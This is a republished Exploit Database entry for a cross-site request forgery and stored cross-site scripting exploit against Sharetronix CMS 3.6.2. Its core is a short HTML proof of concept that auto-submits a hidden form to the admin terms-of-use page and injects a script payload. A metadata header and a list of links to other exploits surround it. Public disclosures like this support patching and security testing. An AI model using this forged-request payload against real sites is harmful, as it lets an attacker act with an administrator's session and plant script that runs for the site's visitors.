Sharetronix CMS 3.6.2 – Cross-Site Request Forgery / Cross-Site Scripting

Exploit Database
18 阅读

作者： Hesam Bazvand

日期： 2018-05-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/44771/

 # Exploit Title: Sharetronix CMS XSRF Vulnerability
# Version : 3.6.2
# Exploit Author: Hesam Bazvand
# Software Link: http://sharetronix.ir/wp-content/uploads/2014/10/gold.zip
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
# Dork : Use You Mind :D
# Email : Black.king066@gmail.com
# Video : https://youtu.be/S1r0tmXEUec


<body onload="document.fm.submit()">
<form method="post" name="fm"action="http://localhost/share/admin/termsofuse">
<input type="hidden" name="tos_enabled" value="1" />
<input type="hidden" name="tos_content"value="<script>alert(1);</script>" />
</form>
</body>

last Exploits
Sharetronix CMS 3.6.2 – Cross-Site Request Forgery / Cross-Site Scripting的更多信息

Ampache 3.5.4 – ‘login.php’ Cross-Site Scripting：
Moodle 2.x/3.x – SQL Injection：
Intelbras Router RF 301K – ‘DNS Hijacking’ Cross-Site Request Forgery (CSRF)：
Feehi CMS 2.1.1 – Remote Code Execution (Authenticated)：
Joomla! Component com_movm – SQL Injection：
Joomla! Component com_informations – SQL Injection：
Phoenix Contact WebVisit 6.40.00 – Password Disclosure：
Joomla! Component com_mediqna 1.1 – Local File Inclusion：